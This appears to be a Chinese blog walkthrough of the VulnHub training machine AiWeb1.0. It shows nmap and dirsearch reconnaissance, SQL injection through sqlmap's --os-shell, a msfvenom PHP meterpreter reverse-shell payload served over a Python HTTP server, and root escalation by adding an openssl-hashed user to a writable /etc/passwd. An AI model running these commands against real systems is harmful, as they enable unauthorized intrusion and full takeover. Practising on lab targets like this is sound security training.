侧边栏壁纸
  • 累计撰写 18 篇文章
  • 累计创建 18 个标签
  • 累计收到 5 条评论

vulnhub-AiWeb1.0

小海
2023-04-05 / 0 评论 / 3 点赞 / 294 阅读 / 1,125 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2023-04-05,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

一、靶机信息

Name: AiWeb1.0
靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/

二、信息收集

nmap扫描发现主机开放了80端口,打开之后并没有发现有啥可用的

nmap -sV -T4 192.168.23.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-05 04:40 EDT
Nmap scan report for 192.168.23.140
Host is up (0.00034s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.84 seconds

目录扫描发现主机下有

dirsearch -u http://192.168.23.140 

image.png
访问发现有m3diNf0/和se3reTdir777/uploads/目录存在继续对着两个目录进行扫描,在/m3diNf0/下发现了/info.php发现了网页的绝对路径,除此之外就没有其他可用信息 .接下来在 se3reTdir777下发现了一个输入框
image.png
image.png
image.png

三、漏洞利用

经过测试输入框存在sql注入,利用sqlmap的–os-shell命令进行反弹shell。sqlmap --os-shell执行原理
image.png
image.png
成功反弹shell但是权限比较低。利用sqlmap写入的文件进行上传马子。使用python2搭建一个简单的服务器,将马子下载到靶机中,并执行上线。

msfvenom -p php/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.23.128 -f raw > shell.php

python2 -m SimpleHTTPServer 8888

image.png
image.png
先使用python转换成交互式shell,这样看着更舒服

python3 -c 'import pty;pty.spawn("/bin/bash")'

发现当前用户不是root用户但是这个用户可以对/etc/passwd 文件进行写入权限,这里我们利用openssl写入一个拥有root的用户

└─$ openssl passwd -1 -salt web 123456
$1$web$dNUtM8dpCeSA69y9NoHCf.

查看权限,已经是root权限,并且成功拿取到flag
image.png
image.png

3

评论区